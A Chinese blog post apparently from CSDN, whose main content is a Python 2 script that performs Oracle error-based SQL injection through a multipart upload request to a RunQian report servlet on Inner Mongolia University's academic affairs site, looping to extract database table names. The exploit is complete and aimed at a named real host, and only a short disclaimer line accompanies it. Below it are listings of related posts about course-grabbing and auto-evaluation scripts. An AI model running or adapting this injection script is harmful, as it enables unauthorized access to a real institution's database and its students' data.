内蒙古大学教务处脱表名脚本

最新推荐文章于 2021-07-03 20:27:08 发布
原创 最新推荐文章于 2021-07-03 20:27:08 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全 #数据库

本文介绍了一种使用Python脚本进行SQL注入攻击的方法。通过构造特定的HTTP请求,该脚本可以尝试从目标网站中获取数据库表名等敏感信息。需要注意的是,这种行为可能违反法律,请仅用于合法的安全测试。 
# -*- coding: gbk -*-
import urllib2
for icounti in range(1000):
    myhehedata="tbl=dual/**/where/**/1=ctxsys.drithsx.sn(1,(SELECT/**/table_name FROM(SELECT/**/user_tables.table_name,ROWNUM/**/AS/**/CON/**/FROM/**/user_tables/**/WHERE ROWNUM/**/<= %s)WHERE/**/CON >=%s))/**/--;keyValue=2;keyCol=1;updateValue=1;updateCol=1" % (str(icounti),str(icounti))
    headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1","Host":"www.ikcw.com","Content-Type":"multipart/form-data","boundary":"---------------------------18427761219428419421453724393"}
    boundary='---------------------------18427761219428419421453724393'
    data=[]
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="file";filename=""')
    data.append('Content-Type: application/octet-stream\r\n')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="update"\r\n')
    data.append(myhehedata)
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="xh"\r\n')
    data.append('test')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="processor"\r\n')
    data.append('com.runqian.report.input.AbstractProcessor')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="backAndRefresh"\r\n')
    data.append('test')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="webTableName"\r\n')
    data.append('test1')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="importTo"\r\n')
    data.append('text')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="params"\r\n')
    data.append('params')
    data.append('--%s' % boundary)
    data.append('Content-Disposition: form-data; name="submit"\r\n')
    data.append('Submit')
    data.append('--%s--' % boundary)
    httpBody='\r\n'.join(data)



    postDataUrl='http://jwxt.imu.edu.cn/servlet/com.runqian.report.input.UploadFile2DBServlet'
    req=urllib2.Request(postDataUrl,data=httpBody,headers=headers)
    resul= urllib2.urlopen(req)

    resulstr= resul.read().decode("gbk")

    arry= resulstr.split('\n')
    print arry[1][15:-3]

大学教务系统javascript一键评价脚本
小King 的笔记本
06-30 945
期末了,又要写上教务系统写评价,好烦,人懒示不想点。可以通过浏览器的控制台一键评价:var iframe = document.getElementById('iframeautoheight'); var innerDoc = iframe.contentDocument || iframe.contentWindow.document; var selects = innerDoc.ge...
正方教务抢课脚本开发,可代开发
li_haoren的博客
01-25 6279
原理,利用 Tampermonkey 在抢课页面,载入自己写的js脚本,实现自动“捡漏”,代开发回复下   分析 提交按钮 是调用了什么函数 在脚本里直接调用,或者照着写一个一直调用就行 旧版教务没直接找到这个函数, 新版教务的js文件里就直接有这个函数 新版教务的提交函数 function saveCourse(trObj,jxb_id,kch_id,jxbzls,qz){ ...
泛函分析——课件(研究生课程)
03-31
泛函,上课课件:Banach 空间;线性算子与线性泛函;谱论初步
华中农业大学教务系统自动评教脚本
一条小黑龙的博客
06-15 4658
前言 针对华中农业大学的评教系统的自动评教脚本,其他学校教务系统不一定适用,解放双手从此刻开始。 脚本执行完之后每个老师将会自动得到4.9的评分,如有特殊需求请后续自行修改,其中评语需要大家自己填写,写完评语后记得点提交 author:浩浩学长 recoder:帅帅龙 进入评教系统界面 打开浏览器开发者工具 按下F12进入浏览器开发者工具,如果没反应就按FN+F12,再无反应请自行百度。不出意外,你的浏览器将会显示如下窗口,点击Console选项卡 执行脚本 在控制台粘贴如下脚本,按下回车静等即可,
Python内蒙古大学教务处并自动计算绩点(小窗体版)
Ecust_applied_math的博客
08-04 1743
直接上代码(可参考以前爬ecust的备注)from tkinter import * from time import ctime import requests as rq from pyquery import PyQuery as pq def gpa(i):#定义绩点 if i=="优": return 3.7 if i=='合格': retu
山大计算机学院教务处,山东大学本科生院教务系统
weixin_33637634的博客
07-03 1711
2011-11-15[山东大学本科生院]山东大学今年招收本科生10200人本报1月8日讯(记者 张科)今天山大公布了“十一五”期间招生计划,其中2006年招收本科生10200人。  山大招生办负责人示,未来5年山大将保持稳定的本科招生规模。2006年招生总规模为10500其它2021-07-03山东大学文件 - 山东大学本科生院山东大学文件 - 山东大学本科生院_其它考试_资格考试/认证_教育专...
武科大计算机科学与技术教务处,武科大教-武汉科技大学教务处.PDF
weixin_29663861的博客
06-25 1799
武科大教-武汉科技大学教务处武科大教 „2018 ‟68 号2017全校各单位:2017 年教学研究项目评审立项工作已经结束,经学校评审,全校共 68 项教学研究项目获校级立项,其中 15 项教学研究项目经教育厅评审获得省级立项,现予以公布(单附后)。教学研究工作是深化教学改革、提高人才培养质量的重要基础性工作,学校对获准立项的教学研究项目给予一定的经费支持。各项目负责人应高度重视立项项目的研...
手机登录科大教务处
jokin12的博客
04-17 2254
电脑端的设置 添加快捷菜单 用IE浏览器(或者其他可以登录教务处的浏览器)打开武科大教务处 进入后在空白的地方点击鼠标右键 出现菜单后点击增加快捷菜单 ![](/file/jwc/pc_1.png 出现如图所示的窗口 选择常用的功能 (教评、选课啥的)提交 刷新教务处页面看快捷菜单是否添加成功 手机上的设置 安装via浏览器 Android版via浏览器下载:点我下载 目前不知道iPhone有...
爬虫-大学教务系统选修课抢课
suxiaorui的博客
04-20 1万+
今天又是一学期的选修课抢课的开始,早上起来选完课想用python来实现模拟网页抢课。 这里我们用的是python3.6,抓包工具charles4.2.8。 首先打开校园官网,进入教务管理系统,可以看到下面这个登录界面。 这里我们首先要获取这个验证码图片,那么该怎么获取呢? 我们按F12打开开发者工具,然后点击这个验证码图片,我们就可以抓取到这个验证码网址 很轻松的就拿到了验证码...
南邮计算机学院教务处,南京邮电大学教务处正方系统:http://jwc.njupt.edu.cn
weixin_30499315的博客
07-02 1312
各学院(部)、各有关单位:根据《关于开展2019年学校“教学标兵奖”和“青年教师优秀教学奖”评选工作的通知》(教发〔2019〕15号),按照《南京邮电大学“教学标兵奖”、“青年教师优秀教学奖”和“优秀教学管理奖”评选办法(修订)》要求,经个人申报、学院推荐、专家评审、结果公示后,报校长办公会批准,确定2019年度“教学标兵奖”10、“青年教师优秀教学奖”8,具体单如下(以姓氏拼音为序):一、...
大学教务管理系统抢课脚本+利用python模拟对抢课页面进行不断点击
10-07
大学教务管理系统抢课脚本+利用python模拟对抢课页面进行不断点击
基于Vue+JavaScript的哈尔滨师范大学教务处教室平台源码.zip
01-11
基于Vue+JavaScript的哈尔滨师范大学教务处教室平台源码.zip基于Vue+JavaScript的哈尔滨师范大学教务处教室平台源码.zip基于Vue+JavaScript的哈尔滨师范大学教务处教室平台源码.zip基于Vue+JavaScript的哈尔滨师范...
三峡大学教务处自动抢课软件
11-16
教务处自动抢课,可以一键生成课,基于历史选课数据的课程推荐,软件经过实战检验,能够在1分钟左右选完想选的全部课程,绝对可靠
python模拟登陆中国海洋大学教务处
01-28
python3模拟登陆中国海洋大学教务处,获取sessionid,获取cookie
华南某工教务处教师评价一键脚本.zip
最新发布
04-27
本次提及的“华南某工教务处教师评价一键脚本.zip”便是一个典型的应用实例。该脚本的出现,旨在简化教师评价的流程,提高教务处工作人员的工作效率,同时也使得教师评价过程更加标准化、规范化。 教师评价是高校...
python依次替换正则达式匹配的字符
热门推荐
一个码农的笔记
12-17 4万+
python一个一个替换正则达式匹配的字符 大家都知道怎么用python的re.sub替换所有的字符串,如果是一个一个替换呢? 我提供一个python2的解决方案 import re def onebyone_replace(string,index): pattern = re.compile(ur'\d') if pattern.search(string[i...
ubuntu 20.04搭建php 5.6,nginx,mysql环境的过程
一个码农的笔记
02-17 3万+
简单记录在ubuntu 20.04搭建php 5.6,nginx,mysql环境的过程的过程 php5.6 sudo apt install python-software-properties -y sudo apt install software-properties-common python-software-properties sudo LC_ALL=C.UTF-8 add-apt-repository ppa:ondrej/php sudo apt update sudo apt insta
安装PyV8的过程
一个码农的笔记
02-12 2万+
忙活这个一天了,一直报错,凌晨的时候终于搞好了,纪录一下 根据 http://www.cnblogs.com/vingi/articles/4131633.html 这个帖子的步骤: 关键: PyV8依赖于Boost,所以安装前先确定你的Linux有没有Boost(就因为这个折腾一下午,官方首页也没说,找了好久) Ubuntu下安装 sudo apt-get install l
vs2015新建mvc的空模版项目
一个码农的笔记
04-05 1万+
这个坑终于被我填了,啧啧 首先打开vs2015 文件->新建->项目 然后: visual c#->asp.net web应用程序 然后: 选择模版选empty,下面【为下项添加文件夹和核心引用】勾选mvc 点击确定就好
东华大学教务处助手使用技巧与功能解析
标题中提到的“东华大学教务处助手源码”明我们讨论的是一款为东华大学(DHU)设计的教务管理辅助软件。这种软件通常旨在为学生提供便捷的教务系统操作界面,并集成多种便捷功能,提高用户与教务系统交互的效率和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值